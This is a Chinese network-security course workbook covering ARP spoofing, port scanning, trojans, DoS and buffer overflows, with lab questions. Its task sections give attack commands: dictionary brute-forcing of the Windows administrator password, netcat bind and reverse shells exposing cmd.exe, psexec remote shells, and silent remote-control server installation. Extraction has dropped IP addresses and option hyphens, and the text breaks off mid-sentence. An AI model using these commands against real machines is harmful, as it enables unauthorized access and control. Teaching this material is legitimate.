网络安全管理-学习工作页.doc

学习工作页学习领域：网络安全管理学习情境：个人电脑安全管理 姓名：班级： 工作任务：ARP病毒诊断与防御日期：组别： 1.1.1 学习情境描述最近某办公室反映很多电脑上网速度慢，一部分职员Email、FTP、QQ 帐号被盗，技 术主管怀疑他们中了 ARP 病毒，要求你先模拟 ARP 病毒攻击，了解 ARP 病毒的特征和原 理，找出中了 ARP 病毒的主机，并给出诊断与防御方案。1.1.2 工作任务分析 获得 ARP 病毒攻击工具 Cain并进行安装 获得协议分析工具WireShark并进行安装 选好攻击对象，使用 Cain工具进行攻击 使用 WireShark获取网络流量，分析 ARP 病毒的特征 使用 Cain工具对攻击对象的流量数据进行解密 列举 ARP 病毒攻击的危害 给出 ARP 病毒的诊断方案 给出 ARP 病毒的防御方案 1.1.3 相关专业知识1.ARP 协议的工作机理 ARP 协议的原理。介绍 ARP 协议之前必须知道为什么需要知道 ARP 协议， 因为当我 们在访问某个网络或者 ping某个网址如：ping 时候， 接着会产生什么呢？ 要解析 成为 IP 地址， 但是在网络中数据传输是以帧的形式进行传输，而 帧中有目标主机的 MAC 地址，（MAC 地址即硬件地址， 每台主机上都有唯一的一个地址）， 本地主机在向目标主机发送帧前， 将目标主机 IP 地址解析成为 MAC 地址， 这就是通过 APR 协议来完成的。 首先，我们假设有两台主机 A,B 在互相通信，假设 A（）,B（） 双方都知道对方的 IP地址，如果A 主机要向 B 主机发送“hello”，那么 A 主机（当然如果 在 A 主机中已经缓存有 B 主机的 MAC 地址 （硬件地址） 那么就不用再去进行下面的查找了）， 首先要在网络上发送广播（一般都是在同一个网段内进行的），广播信息类似于 “ 的 MAC 地址（硬件地址）是什么”，如果 B 主机听见了，那么 B 主机就会发 送“ 的 MAC 地址是” *.*.*.* ”“，MAC 地址一般都是 6Byte 48bit 的 格式，如“04-a3-e3-3a”，这样 A 主机就知道 B 主机的 MAC 地址，所以发送数据帧时，加 上 MAC 地址就不怕找不到目标主机的了。完成广播后，A 主机会将 MAC地址加入到 ARP 缓存 表（所谓 ARP 缓存表就是一张实现 IP 和 MAC 地址进行一一对应的表，并且存储起来），以 备下次再使用。2.ARP 相关命令 Windows ARP 命令允许显示 ARP 表，删除表中的条目，或者将静态条目添加到表中。 ARp常用命令选项： arp -a或arp g 用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的， arp -a Ip 如果我们有多个网卡，那么使用arp -a加上接口的Ip地址，就可以只显示与该接口相关的ARp缓存项目。 arp -s Ip 物理地址 我们可以向ARp高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态，或者在出现错误时，人工配置的物理地址将自动更新该项目。 arp -d Ip 使用本命令能够人工删除一个静态项目。 例如我们在命令提示符下，键入 Arp a；如果我们使用过 ping 命令测试并验证从这台计算机到 Ip 地址为 9 的主机的连通性，则 ARp 缓存显示以下项： Interface: on interface 0x1 Internet Address physical Address Type 9 00-e0-98-00-7c-dc dynamic 在此例中，缓存项指出位于 9 的远程主机解析成 00-e0-98-00-7c-dc 的媒体访问控制地址，它是在远程计算机的网卡硬件中分配的。媒体访问控制地址是计算机用于与网络上远程 TCp/Ip 主机物理通讯的地址。 至此我们可以用ipconfig和ping命令来查看自己的网络配置并判断是否正确、可以用netstat查看别人与我们所建立的连接并找出ICQ使用者所隐藏的Ip信息、可以用arp查看网卡的MAC地址。 3.网络嗅探的原理 网络嗅探器， 可以理解为一个安装在计算机上的窃听设备，它可以用来窃听计算机在网 络上所产生的众多的信息，可以窃听计算机程序在网络上发送和接收到的数据，用来接收在 网络上传输的信息。 很多计算机网络采用的是“共享媒体。也就是说，不必中断他的通讯， 并且配置特别的线路， 再安装嗅探器，几乎可以在任何连接着的网络上直接窃听到同一掩码 范围内的计算机网络数据。这种窃听方式为“基于混杂模式的嗅探”（promiscuous mode）。 以太网的工作原理。以太网的数据传输是基于“共享”原理的：所有的同一本地网范围内 的计算机共同接收到相同的数据包。这意味着计算机直接的通讯都是透明可见的。正是因为 这样的原因， 以太网卡都构造了硬件的“过滤器”,这个过滤器将忽略掉一切和自己无关的网络 信息。事实上是忽略掉了与自身 MAC 地址不符合的信息。嗅探程序正是利用了这个特点， 它把网卡设置为“混杂模式”。 因此， 嗅探程序就能够接收到整个以太网内的网络数据信息了。 在以太网中所有的通讯都是广播的， 也就是说通常在同一个网段的所有网络接口都可以访问 在物理媒体上传输的所有数据， 而每一个网络接口都有一个唯一的硬件地址，这个硬件地址 也就是网卡的 MAC 地址。大多数系统使用 48 比特的地址，这个地址用来表示网络中的每 一个设备。一般来说每一块网卡上的MAC 地址都是不同的，每个网卡厂家得到一段地址，然后用这段地址分配给其生产的每个网卡一个地址。在硬件地址和 IP 地址间使用 ARP 和 RARP 协议进行相互转换。 在正常的情况下，一个网络接口应该只响应这样的两种数据帧： 与自己硬件地址相匹配的数据帧。 发向所有机器的广播数据帧。网卡的工作原理在一个实际的系统中，数据的收发是由网卡来完成的。 网卡接收到传输 来的数据，网卡内的单片程序接收数据帧的目的MAC 地址。根据计算机上的网卡驱动程序 设置的接收模式判断该不该接收。认为该接收就接收后产生中断信号通知 CPU；认为不该 接收就丢掉不管。所以不该接收的数据，网卡就截断了，计算机根本就不知道。CPU 得到 中断信号产生中断， 操作系统就根据网卡的驱动程序设置的网卡中断程序地址调用驱动程序 接收数据，驱动程序接收数据后放入信号堆栈让操作系统处理。 对于网卡一般有四种接收模式： 广播方式：该模式下的网卡能够接收网络中的广播信息。 组播方式：设置在该模式下的网卡能够接收组播数据。 直接方式：在这种模式下，只有目的网卡才能接收该数据。 混杂模式：在这种模式下的网卡能够接收一切通过它的数据,而不管该数据是否是传给它的 1.1.4 任务实施 参考实施步骤见软件使用说明书。完成相应的步骤后回答下列问题：1.TCP/IP协议体系有哪四层?IP地址在哪一层?MAC地址在哪一层?2.ARP协议在网络通信中的作用是什么?3.什么是ARP缓冲区?4.命令ARP -a和ARP -d的功能是什么?5.在ARP缓存中怎样实现IP地址和MAC地址静态绑定?静态绑定能维持很久吗?6.简述同一网段主机的通信过程?7.简述实验室中的学生机访问的通信过程?8.简述网关的作用?9.处于混杂模式下的网卡有什么特点?10.网络噢探的基本原理?11.简述ARP欺骗的原理?12. Cain工具有没有噢探功能?13.使用wireshark工具查看数据包时怎么样只显示目标地址是的数据包?14.常用的使网卡处在混杂模式的软件包是什么?15.如何查看本地计算机的ARP地址，IP地址和网关?16.如何查看本地计算机的连接状况，开启的端口?17. FTP, HTTP, Telnet的端口号是什么?18.端口139， 137， 138， 445的功能是什么?19.简述子网掩码的作用?20.中了ARP病毒的主机有什么现象，为什么?学习工作页学习领域：网络安全管理学习情境：个人电脑安全管理 姓名：班级： 工作任务：计算机远程控制诊断与防御日期：组别： 1.2.1 学习情境描述 最近某办公室职员甲向网络中心反映他的一个网友在qq 上说他能看到甲使用电脑的全部文件和甲的计算机操作过程， 只要他愿意还可以代替甲给电脑安装软件。 技术主管怀疑甲 的电脑被人安装了远程控制软件导致被人远程控制， 要求你对甲的电脑进行诊断，清除控制 程序，并且设计防御方案。 1.2.2 工作任务分析 使用扫描工具（Nmap,X-scan,瑞士军刀）寻找入侵目标 使用协议分析工具WireShark分析多种扫描方式的特点 构造字典，对系统管理员密码进行暴力破解 使用 psexec.exe、tftp等工具在目标主机上远程控制服务器软件r_server.exe 启动远程控制客户端软件，对目标主机进行远程控制 列举远程控制的危害 给出被远程控制主机的诊断方案 给出远程控制的防御方案 1.2.3 相关专业技术知识 1. TCP 三次握手过程 TCP 连接是通过三次握手进行初始化的。 三次握手的目的是同步连接双方的序列号和确 认号并交换 TCP 窗口大小信息。以下步骤概述了通常情况下客户端计算机联系服务器计算 机的过程： 1） 客户端向服务器发送一个 SYN 置位的TCP 报文， 其中包含连接的初始序列号 x和一 个窗口大小（表示客户端上用来存储从服务器发送来的传入段的缓冲区的大小）。 2） 服务器收到客户端发送过来的 SYN 报文后，向客户端发送一个 SYN 和ACK 都置位的 TCP 报文，其中包含它选择的初始序列号 y、对客户端的序列号的确认 x+1 和一个窗口大小 （表示服务器上用来存储从客户端发送来的传入段的缓冲区的大小）。 3）客户端接收到服务器端返回的 SYN+ACK 报文后，向服务器端返回一个确认号 y+1 和 序号 x+1 的 ACK 报文，一个标准的 TCP连接完成。 TCP 使用类似的握手过程来结束连接。 这可确保两个主机均能完成传输并确保所有的数据均得以接收。 表 2-2-1 tcp 数据包标志TCP ClientFlagsTCP Server1 Send SYN (seq=x)-SYN-SYN Received2 SYN/ACK ReceivedACK Received， Connection Establishedw: ISN (Initial Sequence Number) of the Clientx: ISN of the Server标志控制功能 URG：紧急标志 紧急标志置位，ACK：确认标志。确认编号(Acknowledgement Number)栏有效。大多数情况下该标志位是置位的。TCP报头内的确认编号栏内包含的确认编号(w+1，Figure：1)为 下一个预期的序列编号，同时提示远端系统已经成功接收所有数据。 PSH：推标志。该标志置位时，接收端不将该数据进行队列处理，而是尽可能快将数据 转由应用处理。在处理 telnet 或 rlogin 等交互模式的连接时，该标志总是置位的。 RST：复位标志 。复位标志有效。用于复位相应的 TCP 连接。 SYN：同步标志。同步序列编号(Synchronize Sequence Numbers)栏有效。该标志仅在 三次握手建立 TCP 连接时有效。它提示 TCP 连接的服务端检查序列编号，该序列编号为 TCP 连接初始端(一般是客户端)的初始序列编号。在这里，可以把 TCP序列编号看作是一个范围 从 0 到 4，294，967，295 的 32位计数器。通过 TCP连接交换的数据中每一个字节都经过序 列编号。在 TCP 报头中的序列编号栏包括了 TCP分段中第一个字节的序列编号。 FIN：结束标志。带有该标志置位的数据包用来结束一个 TCP 回话，但对应端口仍处于 开放状态，准备接收后续数据。 2. .端口扫描原理 “端口扫描”通常指用同一信息对目标计算机的所有所需扫描的端口进行发送， 然后根据 返回端口状态来分析目标计算机的端口是否打开、是否可用。“端口扫描”行为的一个重要特 征，是在短时期内有很多来自相同的信源地址，传向不同的目的、地端口的包。通常进行端 口扫描的工具目称之为“端口扫描器”。端口扫描器也是一种程序，它可以对目标主机的端口 进行连接，并记录目标端口的应答。端口扫描器通过选用远程 TCP/IP 协议不同的端口的服 务，记录目标计算机端口给予回答的方法， 可以收集到很多关于目标计算机的各种有用信息 （比如是否有端口在侦听，是否允许匿名登录，是否有可写的 FTP 目录，是否能用 Telnet 等）。 虽然端口扫描器可以用于正常网络安全管理， 但就目前来说， 它主要还是被黑客所利用， 是黑客入侵、攻击前期不可缺少的工具。黑客一般先使用扫描工具扫描待入侵主机，掌握目 标主机的端口打开情况，然后采取相应的入侵措施。 无论是正常用途，还是非法用途，端口扫描可以提供 4 个用途。（1）识别目标主机上有哪些端口是开放的，这是端口扫描的最基本目的。 （2）识别目标系统的操作系统类型（Windows、Linux 或 UNIX 等）。 （3）识别某个应用程序或某个特定服务的版本号。 （4）识别目标系统的系统漏洞，这是端口扫描的一种新功能。 目前主要端口扫描技术 TCP connect Scan（TCP连接扫描） 这种方法也称之为“TCP 全连接扫描”。它是最简单的一种扫描技术，所利用的是 TCP 协议的3次握手过程。 它直接连到目标端口并完成一个完整的3次握手过程 （SYN、 SYN/ACK 和 ACK）。操作系统提供的“connect()”函数完成系统调用，用来与目标计算机的端口进行连 接。如果端口处于侦听状态，那么“connect()”函数就能成功。否则，这个端口是不能用的， 即没有提供服务。 TCP SYN Scan（TCP同步序列号扫描） 若端口扫描没有完成一个完整的 TCP 连接， 即在扫描主机和目标主机的一指定端口建 立连接的时候，只完成前两次握手，在第三步时，扫描主机中断了本次连接，使连接没有完 全建立起来，所以这种端口扫描又称为“半连接扫描”，也称为“间接扫描”或“半开式扫描” （Half Open Scan）。SYN 扫描，通过本机的一个端口向对方指定的端口，发送一个 TCP 的 SYN 连接建立请求数据报，然后开始等待对方的应答。如果应答数据报中设置了 SYN 位和 ACK 位，那么这个端口是开放的；如果应答数据报是一个 RST连接复位数据报，则对方的 端口是关闭的。使用这种方法不需要完成 Connect 系统调用所封装的建立连接的整个过程， 而只是完成了其中有效的部分就可以达到端口扫描的目的。 此种扫描方式的优点是不容易被 发现， 扫描速度也比较快。 同时通过对 MAC 地址的判断， 可以对一些路由器进行端口扫描， 缺点是需要系统管理员的权限，不适合使用多线程技术。 TCP FIN Scan（TCP结束标志扫描） 这种扫描方式不依赖于 TCP 的 3 次握手过程，而是 TCP 连接的“FIN”（结束）位标志。 原理在于 TCP 连接结束时，会向 TCP 端口发送一个设置了 FIN 位的连接终止数据报，关闭 的端口会回应一个设置了 RST的连接复位数据报；而开放的端口则会对这种可疑的数据报 不加理睬，将它丢弃。可以根据是否收到 RST数据报来判断对方的端口是否开放。此扫描 方式的优点比前两种都要隐秘，不容易被发现。该方案有两个缺点：首先，要判断对方端口 是否开放必须等待超时，增加了探测时间，而且容易得出错误的结论； UDP Scan（UDP协议扫描） 在 UDP 扫描中，是往目标端口发送一个 UDP 分组。如果目标端口是以一个“ICMP port Unreachable”（ICMP 端口不可到达）消息来作为响应的，那么该端口是关闭的。相反，如 果没有收到这个消息那就可以推断该端口打开着。 ICMP echo 扫描 其实这并不能算是真正意义上的扫描。但有时的确可以通过支持 Ping命令，判断在一个网络上主机是否开机。Ping是最常用的，也是最简单的探测手段，用来判断目标是否活 动。实际上 Ping是向目标发送一个回显（Type8）的 ICMP 数据包，当主机得到请求后， 再返回一个回显（Type0）的数据包。而且 Ping程序一般是直接实现在系统内核中的，而 不是一个用户进程，更加不易被发现。 3.木马 木马程序是目前比较流行的恶意文件， 与一般的病毒不同， 它不会自我繁殖， 也并不 “刻 意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种 者电脑的户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种者的电脑。 木马与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善 意”的控制，因此通常不具有隐蔽性； “木马”则完全相反，木马要达到的是“偷窃”性的 远程控制，如果没有很强的隐蔽性，那将是毫无价值的。木马是如何工作的？ 一个完整的木马系统由硬件部分和软件部分以及具体连接部分组成。 建立木马连接所 必须的硬件实体具体包括控制端、服务端和 Internet。控制端是对服务端进行远程控制的一方，服务端是被远程控制的一方。Internet 是实现控制端对服务端进行远程控制、数据传输 的载体。 实现远程控制也必须要有软件程序，软件程序具体包括控制端程序、木马程序和木马配 置程序。控制端程序是控制端用来远程控制服务端的程序，木马程序是潜入木马内部，获取操作权限的程序。木马配置程序是设置木马程序的端口号、触发条件、木马名称等，使其 在服务端伪装得更隐蔽的程序。 下面来了解一下木马的工作原理。用木马这种工具进行网络放侵， 从过程上大致可分为 配置木马、传播木马、运行木马、信息泄露、建立连接和远程控制。一般情况下，木马都有配置程序，从具体配置内容来主要是为了在服务端尽可能地隐藏好木马，并对信息的反馈方式或地址进行设置。 木马传播方式主要有两种：一种是通过E-mail 将木马程序以附件形式夹在邮件中发送 出去，收信人只要打开附件就会感染木马；另一种是软件下载，一些非正规网站以提供软件 下载为名义， 将木马捆绑在软件安装程序上， 下载后只要运行这些程序， 木马就会自动安装。 木马还会伪装的方式降低用户的警觉，来欺骗用户，常见的欺骗方式有修改图标、捆绑 文件、出错显示、定制端口、自我销毁和木马更名等。 服务端用户运行程序后，木马就会自动进行安装，将自身先复制到 Windows 的系统文 件夹（C:Windows、C:Windowssystem或 C:Windowstemp目录下）中之后，再修改注册表、启动程序，这样，木马的安装就完成了。 设置好的木马一般都会有一个信息反馈机制， 是指木马成功安装后会收集一些服务端的 软硬信息， 并通过电子邮件、 IRC 或 QQ的方式告知控制端用户 （主要包括使用的操作系统、 系统目录、硬盘分区情况、系统口令等）。这些信息中最重要的是服务端 IP 地址，因为只有得到这个参数，控制端才可实现与服务端连接。 一个木马连接的建立必须具备两个条件： 一是服务端已安装了木马程序；二是控制端和 服务端都在线。在此基础上，控制端可以通过服务端建立连接。控制端上的控制端程序可通 过这条通道与服务端上的木马取得联系， 并通过木马程序对服务端进行远程控制。控制端具 有十分广泛的权限，如果服务端被运行，控制端就会像控制自己的机器一样简单。1.2.4 任务实施 1.使用软件列表序号软件名称功能注意事项1Pass.bat,test.bat,mhl.txt( 字典文 件)破解密码2nmap端口扫描软件3x-scan端口扫描软件4Nc.exe端口扫描、后门，远程控制， 文件传输瑞士军刀5r_server.exe,admdll.exe,raddrv.dll远程控制服务器端6radmin远程控制客户端7Psexec.exe,获取远程主机 shell8Tftp服务器Tftp服务器2. 软件使用说明 （1）windows 密码暴力破解 命令格式：pass.bat 字典文件 victim 主机 administrator 如：c:pass.bat c:mhl.txt 6 administrator (2)nmap 使用 Nmap sP -100 扫描指定范围的计算机 Nmap sSp 100-300 扫描指定计算机的指定端口范围， 采用 tcp syn 扫描方式. 参数 sU,sF,sT 使用方法一样，只是端口扫描的技术不一样。 （3）X-scan 使用 设置扫描参数 开始扫描 （4）瑞士军刀的使用 设本地主机 , 远程主机 监听本地端口 1000 Nc.exe l p 1000 /本地主机telnet 1000 /远程主机 程控制远程主机 Nc.exe l p 1000 e cmd.exe /远程主机 telnet 1000 /本地主机 反向连接 Nc.exe l p 1000 /本地主机 Nc.exe e cmd.exe 1000 /远程主机 (5)远程控制软件的使用 Attacker 主机 Psexec.exe Victim 主机 ip 地址,-u 用户名 p 密码 cmd.exe Victim 主机： r_server.exe /install /silence 安装服务器端 r_server.exe /port:8080 /pass:123456 /save /silence 开端口和设置密码 net start r_server 启动服务 Attacker 主机 启动 radmin,连接 victim 主机，输入密码 3.实施回答下列问题：1、系统管理员administrator的密码如何修改?2、如何使用net use与远程计算机建立连接?3、如何使用net命令查看本网段的计算机列表?4、如何使用net命令启动一个服务?5、如何使用net命令停止一个服务?6、如何使用net命令显示本机的共享资源列表?7、如何判断一个主机是否存活?8、如何判断一个主机的哪几个端口处在打开状态?9、列举你知道的扫描软件?10、简述三次握手的过程?11、 TCP数据报中SYN， ACK， RST标志的意义?2、简述扫描器的作用?13、简述黑客入侵系统的过程?14、 TFTP在XP系统中默认安装在哪里?15、 Windows Server 2003中有TFTP吗?16、列举TFTP的常用命令?17、列举你知道的远程控制软件?18、简述瑞士军刀的功能?19、 Nmap是一款什么软件?20、 x-scan能扫描系统漏洞吗?21、如何查看本地端口状况?学习工作页学习领域：网络安全管理学习情境：个人电脑安全管理 姓名：班级： 工作任务：个人电脑整体防御方案设计日期：组别： 1.3.1 学习情景描述 某单位要对所有职员的电脑重装 XP 操作系统，网络中心主管要求你设计一个准对职员 电脑的安全方案，给出标准配置单，方便安装人员进行配置，同时给出一份上网行为注意规 范，减少被黑客入侵的机会。你为了完成好这个任务，对各种攻击技术和不良上网行为进行 了模拟和分析，完成了安全配置单和上网行为规范。 1.3.2 工作任务分析 对主机进行拒绝服务攻击（synflood,傀儡僵尸） 使用协议分析工具WireShark分析拒绝服务的特点的特点 制造木马，进行远程控制（pcshare） 进行 ARP 检测和攻击（winarpattacker） 缓冲区溢出攻击(framework-2.7) 本地计算机安全状态诊断（icesword,ssm） 给出接入计算机的整体安全方案方案 给出标准安全配置单1.3.3 相关专业技术知识 1）. 拒绝服务攻击 拒绝服务攻击是目前黑客经常采用而难以防范的攻击手段，主要分为 DOS 攻击与 DDOS 攻击。 DoS 的攻击方式有很多种，最基本的 DoS 攻击就是利用合理的服务请求来占用过多的 服务资源，从而使合法用户无法得到服务的响应。 DDoS 攻击手段是在传统的DoS 攻击基础 之上产生的一类攻击方式。单一的 DoS 攻击一般是采用一对一方式的，当攻击目标 CPU速 度低、内存小或者网络带宽小等等各项性能指标不高它的效果是明显的。随着计算机与网络 技术的发展，计算机的处理能力迅速增长，内存大大增加，同时也出现了千兆级别的网络， 这使得 DoS 攻击的困难程度加大了。- 目标对恶意攻击包的消化能力加强了不少，例如你 的攻击软件每秒钟可以发送 3,000 个攻击包，但我的主机与网络带宽每秒钟可以处理 10,000 个攻击包，这样一来攻击就不会产生什么效果。 这时侯分布式的拒绝服务攻击手段（DDoS）就应运而生了。你理解了DoS 攻击的话， 它的原理就很简单。如果说计算机与网络的处理能力加大了 10 倍，用一台攻击机来攻击不 再能起作用的话，攻击者使用 10 台攻击机同时攻击呢？用 100 台呢？DDoS 就是利用更多的傀儡机来发起进攻，以比从前更大的规模来进攻受害者。 高速广泛连接的网络给大家带来了方便， 也为 DDoS 攻击创造了极为有利的条件。在低 速网络时代时，黑客占领攻击用的傀儡机时，总是会优先考虑离目标网络距离近的机器，因 为经过路由器的跳数少，效果好。而现在电信骨干节点之间的连接都是以 G 为级别的，大 城市之间更可以达到 2.5G 的连接，这使得攻击可以从更远的地方或者其他城市发起，攻击 者的傀儡机位置可以在分布在更大的范围，选择起来更灵活了。 被 DDoS 攻击时的现象 被攻击主机上有大量等待的 TCP 连接 网络中充斥着大量的无用的数据包，源地址为假 制造高流量无用数据，造成网络拥塞，使受害主机无法正常和外界通讯 利用受害主机提供的服务或传输协议上的缺陷，反复高速的发出特定的服务请求， 使受害主机无法及时处理所有正常请求 严重时会造成系统死机 2）缓冲区溢出攻击 缓冲区溢出攻击是利用缓冲区溢出漏洞所进行的攻击行动. 缓冲区溢出是一种非常普遍、 非常危险的漏洞， 在各种操作系统、 应用软件中广泛存在。 利用缓冲区溢出攻击，可以导致程序运行失败、系统当机、重新启动等后果。更为严重的是， 可以利用它执行非授权指令，甚至可以取得系统特权，进而进行各种非法操作。缓冲区溢出 攻击有多种英文名称：buffer overflow。它们指的都是同一种攻击手段。第一个缓冲区溢出 攻击-Morris蠕虫，发生在二十年前，它曾造成了全世界 6000 多台网络服务器瘫痪。 概念 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的 数据覆盖在合法数据上,理想的情况是 程序检查数据长度并不允许输入超过缓冲区长度的 字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间想匹配,这就为缓冲区溢 出埋下隐患.操作系统所使用的缓冲区 又被称为堆栈. 在各个操作进程之间,指令会被临 时储存在堆栈当中,堆栈也会出现缓冲区溢出 。 危害 在当前网络与分布式系统安全中，被广泛利用的50%以上都是缓冲区溢出，其中最著 名的例子是 1988 年利用 fingerd漏洞的蠕虫。而缓冲区溢出中，最为危险的是堆栈溢出，因 为入侵者可以利用堆栈溢出，在函数返回时改变返回程序的地址，让其跳转到任意地址，带 来的危害一种是程序崩溃导致拒绝服务， 另外一种就是跳转并且执行一段恶意代码， 比如得 到 shell，然后为所欲为。 缓冲区攻击原理 通过往程序的缓冲区写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈， 使程序转而执行其它指令，以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。例如下面程序： void function(char *str) char buffer16; strcpy(buffer,str); 上面的 strcpy()将直接吧 str 中的内容 copy到 buffer 中。这样只要 str 的长度大于 16，就 会造成 buffer 的溢出，使程序运行出错。存在象 strcpy这样的问题的标准函数还有 strcat()， sprintf()，vsprintf()，gets()，scanf()等。 当然，随便往缓冲区中填东西造成它溢出一般只会出现“分段错误” （Segmentation fault），而不能达到攻击的目的。最常见的手段是通过制造缓冲区溢出使程序运行一个用户 shell，再通过 shell 执行其它命令。如果该程序属于 root 且有 suid权限的话，攻击者就获得 了一个有root 权限的 shell，可以对系统进行任意操作了。 缓冲区溢出攻击之所以